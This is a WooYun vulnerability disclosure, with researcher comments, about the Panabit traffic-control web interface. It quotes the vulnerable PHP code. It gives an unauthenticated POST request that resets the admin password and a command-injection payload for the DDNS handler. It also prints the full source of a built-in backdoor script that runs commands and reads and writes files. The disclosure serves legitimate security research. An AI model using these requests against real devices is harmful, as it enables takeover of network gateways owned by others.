当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(31) 关注此漏洞

缺陷编号: WooYun-2015-114137

漏洞标题: panabit高危漏洞合集(官方后门、直接改admin密码以及系统命令执行)

相关厂商: 北京派网软件有限公司

漏洞作者: f4ckbaidu

提交时间: 2015-05-16 17:50

公开时间: 2015-08-16 14:36

漏洞类型: 远程代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 官方后门 系统命令执行

10人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-16: 细节已通知厂商并且等待厂商处理中
2015-05-18: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-07-12: 细节向核心白帽子及相关领域专家公开
2015-07-22: 细节向普通白帽子公开
2015-08-01: 细节向实习白帽子公开
2015-08-16: 细节向公众公开

简要描述:

新版UI的问题,开发真是日了狗了

详细说明:

测试版本:

1.png



所有漏洞利用起来都不需要登陆哦,详情参考下面描述:



0x01 无需登录就可配置系统

很多功能不需要登陆就可以使用,更改流控配置,我就以修改密码为例

看下修改密码的逻辑功能代码,直接无语:

(/usr/ramdisk/www/sys/maintain/system_handle.php)

code 区域
if ($type == "changepass_handle") {
$oldpass = postval("oldpass");
$newpass = postval("newpass");
$loginuser = postval("loginuser");

exec("cat /etc/.htpasswd2 | grep $loginuser:$oldpass", $out, $ret);
if ($out[0] == "") {
outputres("no", "");
exit;
}
<修改密码逻辑>



不判断$oldpass是否为空,屌渣天的程序猿

不需要知道旧密码,直接POST “type=changepass_handle&loginuser=admin&newpass=123”就可以把admin密码改了

并且http://IP/sys/Maintain/system_handle.php这个页面不需要登陆就可以访问,不信你试试

2.png





0x02 系统命令注入

还是/usr/ramdisk/www/sys/maintain/system_handle.php:

code 区域
if ($type == "ddns_config_handle") {
$ddns_enable = postval("ddns_enable");

$cmd = $ipe_ddns." -e $ddns_enable";
exec($cmd, $out, $ret);
if ($ret != "0") {
outputres("no", $out[0]);
exit;
}

outputres("yes", "");
}



这个没什么好说的

POST http://IP/sys/Maintain/system_handle.php

code 区域
type=ddns_config_handle&ddns_enable=0|id>/tmp/fuck.txt



web根目录/usr/ramdisk不可写,所以写在/tmp/目录下测试

3.png



好多php都用了exec函数,一个一个改吧

code 区域
panaos#find /usr/ramdisk/www/ -name "*.php" | xargs grep -E "exec" | awk -F ":" '{print $1}' | sort -u
/usr/ramdisk/www/app/conlimit/php/app_node.php
/usr/ramdisk/www/app/conlimit/php/app_position.php
/usr/ramdisk/www/app/conlimit/php/appview_data.php
/usr/ramdisk/www/app/conlimit/php/appview_policy.php
/usr/ramdisk/www/app/conlimit/php/bps_dump.php
/usr/ramdisk/www/app/conlimit/php/common.php
/usr/ramdisk/www/app/conlimit/php/conlimit.php
/usr/ramdisk/www/app/conlimit/php/conlimit_addrule.php
/usr/ramdisk/www/app/conlimit/php/conlimit_editrule.php
/usr/ramdisk/www/app/conlimit/php/getapp.php
/usr/ramdisk/www/app/conlimit/php/grpview.php
/usr/ramdisk/www/app/conlimit/php/ipgrp.php
/usr/ramdisk/www/app/conlimit/php/lan_handle.php
/usr/ramdisk/www/app/conlimit/php/policy_conlimit.php
/usr/ramdisk/www/app/conlimit/php/policy_listtime.php
/usr/ramdisk/www/app/conlimit/php/policy_time_add.php
/usr/ramdisk/www/app/conlimit/php/policy_time_edit.php
/usr/ramdisk/www/app/conlimit/php/show_appinfo.php
/usr/ramdisk/www/app/ixcache/php/common.php
/usr/ramdisk/www/app/ixcache/php/ixcache_config.php
/usr/ramdisk/www/app/ixcache/php/ixcache_handle.php
/usr/ramdisk/www/app/mac/php/common.php
/usr/ramdisk/www/app/mac/php/downloadconf.php
/usr/ramdisk/www/app/mac/php/ipgrp.php
/usr/ramdisk/www/app/mac/php/mac_config.php
/usr/ramdisk/www/app/mac/php/mac_handle.php
/usr/ramdisk/www/app/urlfilter/php/common.php
/usr/ramdisk/www/app/urlfilter/php/ipgrp.php
/usr/ramdisk/www/app/urlfilter/php/policy_listtime.php
/usr/ramdisk/www/app/urlfilter/php/policy_time_add.php
/usr/ramdisk/www/app/urlfilter/php/policy_time_edit.php
/usr/ramdisk/www/app/urlfilter/php/policy_urlfilter.php
/usr/ramdisk/www/app/urlfilter/php/urldnsgrp.php
/usr/ramdisk/www/app/urlfilter/php/urlext.php
/usr/ramdisk/www/app/urlfilter/php/urlfilter_addrule.php
/usr/ramdisk/www/app/urlfilter/php/urlfilter_editrule.php
/usr/ramdisk/www/app/urlfilter/php/urlfilteraddrule.php
/usr/ramdisk/www/app/webauth/php/auth_config.php
/usr/ramdisk/www/app/webauth/php/common.php
/usr/ramdisk/www/app/webauth/php/downloadconf.php
/usr/ramdisk/www/app/webauth/php/ipgrp.php
/usr/ramdisk/www/app/webauth/php/webauth.php
/usr/ramdisk/www/app/webauth/php/webauth_handle.php
/usr/ramdisk/www/sys/app_position.php
/usr/ramdisk/www/sys/common.php
/usr/ramdisk/www/sys/downloadconf.php
/usr/ramdisk/www/sys/login/login_handle.php
/usr/ramdisk/www/sys/maintain/alert.php
/usr/ramdisk/www/sys/maintain/config_syn.php
/usr/ramdisk/www/sys/maintain/datalog.php
/usr/ramdisk/www/sys/maintain/ddns_add.php
/usr/ramdisk/www/sys/maintain/ddns_config.php
/usr/ramdisk/www/sys/maintain/ddns_edit.php
/usr/ramdisk/www/sys/maintain/device_set.php
/usr/ramdisk/www/sys/maintain/dhcp.php
/usr/ramdisk/www/sys/maintain/hdlevtconfig.php
/usr/ramdisk/www/sys/maintain/ifspeed.php
/usr/ramdisk/www/sys/maintain/ifspeed_set.php
/usr/ramdisk/www/sys/maintain/ip_summary.php
/usr/ramdisk/www/sys/maintain/ipstat_config_html.php
/usr/ramdisk/www/sys/maintain/ipstat_hdl.php
/usr/ramdisk/www/sys/maintain/license_info.php
/usr/ramdisk/www/sys/maintain/license_upgrade_hdl.php
/usr/ramdisk/www/sys/maintain/session.php
/usr/ramdisk/www/sys/maintain/share_config.php
/usr/ramdisk/www/sys/maintain/sys_clearlog.php
/usr/ramdisk/www/sys/maintain/system_handle.php
/usr/ramdisk/www/sys/maintain/system_info.php
/usr/ramdisk/www/sys/maintain/system_upgrade.php
/usr/ramdisk/www/sys/maintain/tos.php
/usr/ramdisk/www/sys/maintain/tos_config_html.php
/usr/ramdisk/www/sys/maintain/tos_hdl.php
/usr/ramdisk/www/sys/maintain/url.php
/usr/ramdisk/www/sys/monitor/app_detail.php
/usr/ramdisk/www/sys/monitor/app_node.php
/usr/ramdisk/www/sys/monitor/app_topn.php
/usr/ramdisk/www/sys/monitor/appgroup_html.php
/usr/ramdisk/www/sys/monitor/appgroup_stacking.php
/usr/ramdisk/www/sys/monitor/appview_data.php
/usr/ramdisk/www/sys/monitor/appview_policy.php
/usr/ramdisk/www/sys/monitor/bps_3dayupdn.php
/usr/ramdisk/www/sys/monitor/bps_dump.php
/usr/ramdisk/www/sys/monitor/bps_updown.php
/usr/ramdisk/www/sys/monitor/bpscur.php
/usr/ramdisk/www/sys/monitor/cpu.php
/usr/ramdisk/www/sys/monitor/curr_bps_dump.php
/usr/ramdisk/www/sys/monitor/currbpspoint.php
/usr/ramdisk/www/sys/monitor/flow_rate.php
/usr/ramdisk/www/sys/monitor/flowcur.php
/usr/ramdisk/www/sys/monitor/getapp.php
/usr/ramdisk/www/sys/monitor/group_pie.php
/usr/ramdisk/www/sys/monitor/group_stack.php
/usr/ramdisk/www/sys/monitor/grpview.php
/usr/ramdisk/www/sys/monitor/history_iptrend.php
/usr/ramdisk/www/sys/monitor/if_handle.php
/usr/ramdisk/www/sys/monitor/info_system.php
/usr/ramdisk/www/sys/monitor/ip_summary.php
/usr/ramdisk/www/sys/monitor/ip_topn.php
/usr/ramdisk/www/sys/monitor/ip_trend_cur.php
/usr/ramdisk/www/sys/monitor/ipview_account.php
/usr/ramdisk/www/sys/monitor/ipview_data.php
/usr/ramdisk/www/sys/monitor/ipview_flow.php
/usr/ramdisk/www/sys/monitor/ipview_lip.php
/usr/ramdisk/www/sys/monitor/ipview_mobile.php
/usr/ramdisk/www/sys/monitor/ipview_userinfo.php
/usr/ramdisk/www/sys/monitor/mobstat.php
/usr/ramdisk/www/sys/monitor/policy_setlink_hldold.php
/usr/ramdisk/www/sys/monitor/proxy_chart_trend.php
/usr/ramdisk/www/sys/monitor/proxy_detail.php
/usr/ramdisk/www/sys/monitor/proxy_grp.php
/usr/ramdisk/www/sys/monitor/proxy_show.php
/usr/ramdisk/www/sys/monitor/proxy_stat.php
/usr/ramdisk/www/sys/monitor/show_appinfo.php
/usr/ramdisk/www/sys/monitor/summary.php
/usr/ramdisk/www/sys/monitor/usercur.php
/usr/ramdisk/www/sys/monitor/usrgrp_view.php
/usr/ramdisk/www/sys/monitor/vlink.php
/usr/ramdisk/www/sys/monitor/vlink_add.php
/usr/ramdisk/www/sys/monitor/vlink_edit.php
/usr/ramdisk/www/sys/myapp/auth_config.php
/usr/ramdisk/www/sys/myapp/mac_config.php
/usr/ramdisk/www/sys/myapp/mac_handle.php
/usr/ramdisk/www/sys/myapp/myapp_handle.php
/usr/ramdisk/www/sys/myapp/webauth.php
/usr/ramdisk/www/sys/myapp/webauth_handle.php
/usr/ramdisk/www/sys/pppoe/account_import_output.php
/usr/ramdisk/www/sys/pppoe/account_pool_change.php
/usr/ramdisk/www/sys/pppoe/ippool_adduser.php
/usr/ramdisk/www/sys/pppoe/ippool_edit.php
/usr/ramdisk/www/sys/pppoe/ippool_edituser.php
/usr/ramdisk/www/sys/pppoe/l2bypass_account.php
/usr/ramdisk/www/sys/pppoe/l2bypass_addacc.php
/usr/ramdisk/www/sys/pppoe/l2bypass_config.php
/usr/ramdisk/www/sys/pppoe/l2bypass_config_html.php
/usr/ramdisk/www/sys/pppoe/notify_msg.php
/usr/ramdisk/www/sys/pppoe/pppoe_account.php
/usr/ramdisk/www/sys/pppoe/pppoe_addsvr.php
/usr/ramdisk/www/sys/pppoe/pppoe_config.php
/usr/ramdisk/www/sys/pppoe/pppoe_editsvr.php
/usr/ramdisk/www/sys/pppoe/pppoe_handle.php
/usr/ramdisk/www/sys/pppoe/pppoe_online.php
/usr/ramdisk/www/sys/protocol/app_seek.php
/usr/ramdisk/www/sys/protocol/appgroup.php
/usr/ramdisk/www/sys/protocol/getsons.php
/usr/ramdisk/www/sys/protocol/ipprotect.php
/usr/ramdisk/www/sys/protocol/pro_config.php
/usr/ramdisk/www/sys/protocol/pro_handle.php
/usr/ramdisk/www/sys/protocol/seekparent.php
/usr/ramdisk/www/sys/route/dns_addrule.php
/usr/ramdisk/www/sys/route/dns_editrule.php
/usr/ramdisk/www/sys/route/lan_add.php
/usr/ramdisk/www/sys/route/lan_edit.php
/usr/ramdisk/www/sys/route/lan_handle.php
/usr/ramdisk/www/sys/route/policy_addrule.php
/usr/ramdisk/www/sys/route/policy_editrule.php
/usr/ramdisk/www/sys/route/portmap_add.php
/usr/ramdisk/www/sys/route/portmap_edit.php
/usr/ramdisk/www/sys/route/proxy_export.php
/usr/ramdisk/www/sys/route/proxy_import.php
/usr/ramdisk/www/sys/route/wan_add.php
/usr/ramdisk/www/sys/route/wan_edit.php
/usr/ramdisk/www/sys/setup/apptype.php
/usr/ramdisk/www/sys/setup/conlimit.php
/usr/ramdisk/www/sys/setup/conlimit_addrule.php
/usr/ramdisk/www/sys/setup/conlimit_editrule.php
/usr/ramdisk/www/sys/setup/flow.php
/usr/ramdisk/www/sys/setup/ipgrp.php
/usr/ramdisk/www/sys/setup/ipgrploadfile.php
/usr/ramdisk/www/sys/setup/listtime.php
/usr/ramdisk/www/sys/setup/pipe.php
/usr/ramdisk/www/sys/setup/pipeinfo.php
/usr/ramdisk/www/sys/setup/pipepriority.php
/usr/ramdisk/www/sys/setup/policy_addrule.php
/usr/ramdisk/www/sys/setup/policy_conlimit.php
/usr/ramdisk/www/sys/setup/policy_editrule.php
/usr/ramdisk/www/sys/setup/policy_flow.php
/usr/ramdisk/www/sys/setup/policy_head.php
/usr/ramdisk/www/sys/setup/policy_link.php
/usr/ramdisk/www/sys/setup/policy_listtime.php
/usr/ramdisk/www/sys/setup/policy_setlink.php
/usr/ramdisk/www/sys/setup/policy_stat.php
/usr/ramdisk/www/sys/setup/policy_time_add.php
/usr/ramdisk/www/sys/setup/policy_time_edit.php
/usr/ramdisk/www/sys/setup/policy_urlfilter.php
/usr/ramdisk/www/sys/setup/policygroup.php
/usr/ramdisk/www/sys/setup/proxy.php
/usr/ramdisk/www/sys/setup/rule.php
/usr/ramdisk/www/sys/setup/setpriority.php
/usr/ramdisk/www/sys/setup/share_config.php
/usr/ramdisk/www/sys/setup/tree.php
/usr/ramdisk/www/sys/setup/urldnsgrp.php
/usr/ramdisk/www/sys/setup/urlext.php
/usr/ramdisk/www/sys/setup/urlfilter_addrule.php
/usr/ramdisk/www/sys/setup/urlfilter_editrule.php
/usr/ramdisk/www/sys/setup/urlfilteraddrule.php
/usr/ramdisk/www/sys/setup/usragpiframeold2.php
/usr/ramdisk/www/sys/setup/usrgrp.php
/usr/ramdisk/www/sys/sysrun.php
/usr/ramdisk/www/sys/tendency/app_seek.php
/usr/ramdisk/www/sys/tendency/setlink.php
/usr/ramdisk/www/sys/tendency/tengency.php
/usr/ramdisk/www/sys/top.php
/usr/ramdisk/www/sys/version.php





0x03 官方后门

code 区域
panaos#cat /usr/ramdisk/www/sys/cmdhandle.php 
<?php
$doc = $_SERVER['DOCUMENT_ROOT'];
$cmd = $_POST["cmd"];
$type = $_POST['type'];

if ($type == "get"){
$ds = explode(' ', $cmd);

$fp = popen($cmd, "r");
if (!$fp){
echo "命令执行失败";
exit(0);
}

if (is_file($ds[1]) && !file_exists($ds[1])){
echo "file no found\n";
exit(0);
}
$str = "";
while(! feof($fp)){
$s = htmlspecialchars(fgets($fp));
$s = str_replace("\n", "<br/>", $s);
if ($s == "\n") continue;
$str .= " ".$s;
}
echo iconv("gb2312", "utf-8", $str);
exit(0);
}

if ($type == "viget"){
$ds = explode(' ', $cmd);

$fp = popen($cmd, "r");
if (!$fp){
echo "命令执行失败";
exit(0);
}

if (is_file($ds[1]) && !file_exists($ds[1])){
echo "file no found\n";
exit(0);
}
$str = "";
while(! feof($fp)){
$s = (fgets($fp));
if ($s == "\n") continue;
$str .= $s;
}
echo iconv("gb2312", "utf-8", $str);
exit(0);
}

if ($type == "save"){
$con = urldecode($_POST['con']);

if (!is_file($cmd)){
echo "该文件不可编辑";
exit(0);
}

$fp = fopen($cmd, "w");
if (!$fp){
echo "打开文件失败";
exit(0);
}
fwrite($fp, $con);
fclose($fp);
echo "操作成功";
}



这个也没什么好说的,官方自己留的命令执行、文件读写后门,以命令执行为例:

4.png

漏洞证明:

2.png



3.png



4.png

修复方案:

u know

版权声明:转载请注明来源 f4ckbaidu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-18 14:34

厂商回复:

CNVD未直接所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-05-14 17:57 | f4ck ( 实习白帽子 | Rank:42 漏洞数:7 | 有些人很牛B,一个漏洞能刷成N个。)
    0

    这个叼,panabit用的企业还真不少。

  2. 2015-05-14 17:58 | PgHook ( 普通白帽子 | Rank:1020 漏洞数:123 | Portulaca grandiflora Hook.)
    0

    这个还是挺屌的。

  3. 2015-05-20 10:11 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
    0

    @f4ck 来看看,你们一家人吗

  4. 2015-05-20 10:25 | f4ck ( 实习白帽子 | Rank:42 漏洞数:7 | 有些人很牛B,一个漏洞能刷成N个。)
    0

    @wefgod 我来看我大表哥。

  5. 2015-05-21 17:33 | 真旅网集团(乌云厂商)
    0

    这个就不应该放出去,直接限制到内网~

  6. 2015-05-21 20:02 | f4ckbaidu ( 普通白帽子 | Rank:243 漏洞数:32 | 开发真是日了狗了)
    0

    @真旅网集团 好多小企业、网吧在用,他们的安全意识,你懂的

  7. 2015-07-27 15:21 | f4ckbaidu ( 普通白帽子 | Rank:243 漏洞数:32 | 开发真是日了狗了)
    0

    这个木有$?

  8. 2015-07-31 11:39 | f4ckbaidu ( 普通白帽子 | Rank:243 漏洞数:32 | 开发真是日了狗了)
    0

    @疯狗

  9. 2015-09-29 11:10 | 名字xsser ( 路人 | Rank:5 漏洞数:1 | 顺流而下,把梦做完|最近小忙,有问题可以...)
    0

    第一处改密码那难道不就是个命令注入吗??

登录后才能发表评论,请先 登录